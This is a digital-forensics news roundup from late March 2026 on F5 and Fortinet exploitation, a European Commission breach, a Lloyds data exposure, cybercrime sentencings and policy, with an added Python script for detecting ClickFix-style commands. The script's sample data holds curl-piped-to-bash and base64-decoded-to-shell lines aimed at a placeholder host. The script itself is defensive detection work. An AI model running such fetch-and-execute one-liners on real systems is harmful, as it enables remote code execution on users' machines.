Monday, March 30 2026
DFM News Roundup
Digital Forensics Magazine — 48h News Roundup
Window: 2026-03-28 09:08 UTC to 2026-03-30 09:08 UTC

Snapshot Summary

Sector / Section               | Headline Highlights                  | Count
DFIR & Incident Response       | KEV pressure on F5                   | 1
Cyber Investigations           | Patel inbox compromise reviewed      | 1
Major Cyber Incidents          | EU breach confirmed; Lloyds exposure | 2
Exploits & Threat Intelligence | F5, Fortinet, ClickFix activity      | 3
Law Enforcement                | US cybercrime sentencings advance    | 2
Policy                         | UK assessment, cyber-risk warning    | 2
Standards & Compliance         | ETSI and AI evaluation moves         | 2
Consumer App Data Leaks        | No additional credible updates       | 1

Digital Forensics & Incident Response

[AMER] CISA’s Known Exploited Vulnerabilities catalog added the F5 BIG-IP flaw CVE-2025-53521 on 2026-03-27, and follow-on reporting on 2026-03-30 said the bug has been reclassified from denial-of-service to remote code execution and is being exploited in the wild. For responders, that combination means exposure triage should cover every internet-facing BIG-IP instance, log review should look for post-exploitation behavior rather than only crash or outage symptoms, and any containment plan written while the flaw was still rated as denial-of-service only should be revisited (Source: SecurityWeek, 30-03-2026).

No additional credible updates in the last 72h.

Cyber Investigations

[AMER] The FBI confirmed on 2026-03-29 that Iranian-linked actors breached FBI Director Kash Patel’s personal email account, with published material reportedly dating from earlier years and not containing government information. Investigators and executive-protection teams should read the case as another reminder that personal accounts, archival data, and reputational targeting remain live attack surfaces even when an adversary does not reach official systems (Source: BleepingComputer, 29-03-2026).

No additional credible updates in the last 72h.

Major Cyber Incidents

[EMEA] The European Commission confirmed on 2026-03-30 that the March 24 attack on infrastructure supporting the Europa web platform led to a data breach, after earlier statements on 2026-03-27 said the incident had been contained and internal systems were not impacted. This matters because a compromise of shared hosting infrastructure can reach data that the individual sites on it treated as isolated, which remains a live operational risk for multi-site public-sector web estates; defenders should expect renewed focus on segmentation, per-site account scoping, and forensic preservation in shared hosting environments (Source: BleepingComputer, 30-03-2026).

[EMEA] Reuters reported on 2026-03-27 that nearly 448,000 Lloyds Banking Group customers were affected by an IT glitch that exposed transaction data and some personal details to other users during a March incident in the UK. Even though the event was described as a glitch rather than a confirmed intrusion, it still shows why cyber and resilience teams must treat access-control failures, data segregation errors, and customer-facing misrouting as incident-response events with regulatory consequences (Source: Reuters, 27-03-2026).

Exploits & Threat Intelligence

[AMER] SecurityWeek reported on 2026-03-30 that attackers are exploiting CVE-2025-53521 in F5 BIG-IP after the flaw was upgraded to critical remote code execution severity, with CISA having already pushed the issue into its KEV workflow on 2026-03-27. The shift from what many defenders understood as a denial-of-service problem to an RCE changes patch urgency, hunt priorities, and edge-device monitoring requirements for organizations that rely on BIG-IP in front of core applications (Source: SecurityWeek, 30-03-2026).

[AMER] BleepingComputer reported on 2026-03-30 that a critical Fortinet FortiClient EMS SQL injection flaw, tracked as CVE-2026-21643, is now being actively exploited and can allow unauthenticated command or code execution through the management interface. For blue teams, the risk is especially acute because compromised endpoint-management infrastructure can become a force multiplier for laterally spreading malware, pushing malicious policy changes, or suppressing remediation visibility across fleets (Source: BleepingComputer, 30-03-2026).

[AMER] SecurityWeek and BleepingComputer both highlighted on 2026-03-28 a Cloudflare-themed ClickFix campaign delivering the Python-based Infiniti Stealer to macOS users through fake human-verification prompts and Bash execution that ultimately runs a Nuitka-packed payload. The campaign matters because it blends social engineering with cross-platform tradecraft that undermines the assumption that macOS fleets are low-risk, so user-awareness training and telemetry on shell and script execution, in particular commands a user pastes into a terminal, become first-order detection inputs for enterprise macOS estates (Source: SecurityWeek, 28-03-2026).
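As an added example (not code from the Digital Forensics Magazine page or from either cited report), the following Python script applies the kind of script-execution telemetry the item calls for: it parses constructed macOS process-execution events and flags ClickFix-style one-liners, namely a remote fetch piped straight into a shell or an encoded blob decoded into a shell, and escalates when the parent process suggests a user pasted the command into a terminal. It is deliberately more general than the single campaign described above. The tab-separated field layout, the INTERACTIVE_PARENTS set, the regular expressions and the sample lines are all assumptions for illustration, not indicators published for the Infiniti Stealer campaign.

```python
"""Added example: heuristic detection of ClickFix-style shell one-liners on macOS.

Not code from the Digital Forensics Magazine page or from the cited reports.
The telemetry format (tab-separated: timestamp, parent image, image, command line),
the INTERACTIVE_PARENTS set, the regexes and SAMPLE_LINES are all assumptions
for illustration, not published indicators for the Infiniti Stealer campaign.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    ts: str        # event timestamp
    parent: str    # parent process image name (assumed EDR field)
    image: str     # executing binary name
    cmdline: str   # full command line


# Parents that suggest a human pasted the command into a terminal or that it was
# launched from an AppleScript prompt (assumption; tune to your EDR's naming).
INTERACTIVE_PARENTS = {"Terminal", "iTerm2", "osascript", "Finder"}

SHELLS = {"sh", "bash", "zsh"}

# A download piped straight into a shell: curl/wget ... | sh|bash|zsh
FETCH_PIPE_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b")
# An encoded blob decoded and handed to a shell: base64 -d|-D|--decode ... | sh|bash|zsh
DECODE_TO_SHELL = re.compile(r"\bbase64\s+(-d|-D|--decode)\b[^|]*\|\s*(ba|z)?sh\b")


def parse_line(line: str) -> ProcEvent:
    """Parse one tab-separated telemetry line into a ProcEvent."""
    ts, parent, image, cmdline = line.rstrip("\n").split("\t", 3)
    return ProcEvent(ts, parent, image, cmdline)


def score_event(ev: ProcEvent) -> list[str]:
    """Return the heuristic names an event triggers; an empty list means no finding."""
    hits: list[str] = []
    if ev.image not in SHELLS:
        return hits
    if FETCH_PIPE_SHELL.search(ev.cmdline):
        hits.append("remote_fetch_piped_to_shell")
    if DECODE_TO_SHELL.search(ev.cmdline):
        hits.append("encoded_payload_to_shell")
    # Only escalate on the parent once a payload heuristic has fired; otherwise
    # every ordinary interactive shell session would generate noise.
    if hits and ev.parent in INTERACTIVE_PARENTS:
        hits.append("interactive_parent")
    return hits


def detect(lines: list[str]) -> list[tuple[str, list[str]]]:
    """Run the heuristics over telemetry lines; return (timestamp, hits) per finding."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        ev = parse_line(line)
        hits = score_event(ev)
        if hits:
            findings.append((ev.ts, hits))
    return findings


# Constructed sample telemetry (not real campaign data).
SAMPLE_LINES = [
    "\t".join(["2026-03-28T10:02:11Z", "Terminal", "bash",
               'bash -c "curl -fsSL https://example.invalid/verify.sh | bash"']),
    "\t".join(["2026-03-28T10:05:40Z", "launchd", "bash",
               "/bin/bash /usr/local/bin/nightly-backup.sh"]),
    "\t".join(["2026-03-28T10:07:03Z", "osascript", "sh",
               'sh -c "echo aGVsbG8K | base64 -d | sh"']),
    "\t".join(["2026-03-28T10:09:15Z", "Terminal", "zsh",
               'zsh -c "curl -fsSL https://example.invalid/x.sh -o /tmp/x.sh"']),
]

if __name__ == "__main__":
    for ts, hits in detect(SAMPLE_LINES):
        print(ts, ", ".join(hits))
```

Run as a script it prints the two flagged timestamps with their heuristic names. The fourth sample line, a plain download with no pipe into a shell, is left unflagged on purpose: the heuristics key on the hand-off to an interpreter rather than on curl alone, which keeps routine installer and backup activity out of the queue while still catching the paste-and-run shape that ClickFix lures depend on. In production the same scoring would sit over an EDR process-event feed instead of a list of strings.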

Law Enforcement

[AMER] The U.S. Department of Justice said on 2026-03-27 that an extradited Kenyan national was sentenced for his role in a business email compromise conspiracy that used forged invoices, contracts, and wire instructions to drive more than $12 million in losses. The case matters operationally because it shows prosecutors continuing to prioritize financially motivated cyber-enabled fraud chains that mix account compromise, social engineering, and mule infrastructure rather than ransomware alone (Source: U.S. Department of Justice, 27-03-2026).

[AMER] DOJ listings published in late March 2026 show a Russian citizen was sentenced on 2026-03-23 for hacking U.S. companies and enabling major cybercrime groups that extorted tens of millions of dollars from victims. For defenders, the sentencing underscores how access brokers, botnet operators, and ransomware affiliates remain tightly linked in the criminal ecosystem, which is useful context when attributing intrusion stages and prioritizing intelligence-sharing with law enforcement (Source: U.S. Department of Justice CCIPS, 23-03-2026).

Policy

[EMEA] The UK National Crime Agency launched its National Strategic Assessment 2026 on 2026-03-28 and warned that the boundaries between crime types are blurring, including the radicalization of teenagers into cybercrime and other digitally enabled offending. The policy signal for DFIR leaders is that cyber defense can no longer be separated cleanly from fraud, safeguarding, and serious organized crime strategy, especially when prevention and disruption depend on earlier intervention (Source: NCA, 28-03-2026).

[EMEA] Reuters reported on 2026-03-26 that the UK sanctioned operators linked to a major Cambodia-based scam compound and the Xinbi crypto marketplace, targeting infrastructure allegedly used for online fraud and stolen-data trading. That matters for cyber professionals because sanctions policy is increasingly being used to pressure the enabling layers behind fraud ecosystems, affecting threat-finance tracing, vendor screening, exchange exposure, and cross-border cooperation strategies (Source: Reuters, 26-03-2026).

Standards & Compliance

[EMEA] ETSI materials published during the week ending 2026-03-27 show continued movement on cybersecurity standardization, including a newly published quantum-safe work item and fresh visibility into the Securing Artificial Intelligence track. For compliance teams, the important takeaway is that AI-security and crypto-agility requirements are converging toward more explicit, auditable expectations, which will influence procurement language and technical-control baselines well before regulations formally bite (Source: ETSI, 27-03-2026).

[AMER] NIST’s Center for AI Standards and Innovation announced on 2026-03-27 a CRADA with OpenMined to enable secure AI evaluations, extending the standards-and-assurance conversation beyond model performance into safer testing environments. While not a compliance rule by itself, it is a practical marker that evaluation integrity, data handling, and reproducible security testing are becoming central expectations in AI governance and third-party assurance programs (Source: NIST, 27-03-2026).

Consumer App Data Leaks

[EMEA] Reuters’ 2026-03-27 report on the Lloyds customer-data exposure remains the most credible consumer-facing digital privacy event in this cycle, with no second comparable app-specific leak verified across major sources inside the fallback window. For practitioners, the episode still reinforces that front-end product defects can create breach-like outcomes for large user populations and should be folded into privacy-by-design reviews and incident playbooks (Source: Reuters, 27-03-2026).

No additional credible updates in the last 72h.

Editorial Perspective

This cycle points to a familiar but intensifying pattern: internet-facing edge software and management platforms are still converting quickly from patch issues into active operational risk.

At the same time, several of the most consequential stories were not classic ransomware events but breaches, misrouting, and politically charged compromise disclosures that still demanded full incident-response discipline.

The strategic through-line for defenders is convergence: cybercrime, fraud, sanctions, AI assurance, and product security are increasingly part of one response picture. Teams that separate threat intelligence, resilience, privacy, and compliance too rigidly are likely to miss the real blast radius of the next incident.

Tags

DFIR, Incident Response, Threat Intelligence, F5 BIG-IP, Fortinet, Europa.eu, Data Breach, BEC, Cybercrime, AI Security, Compliance, Policy
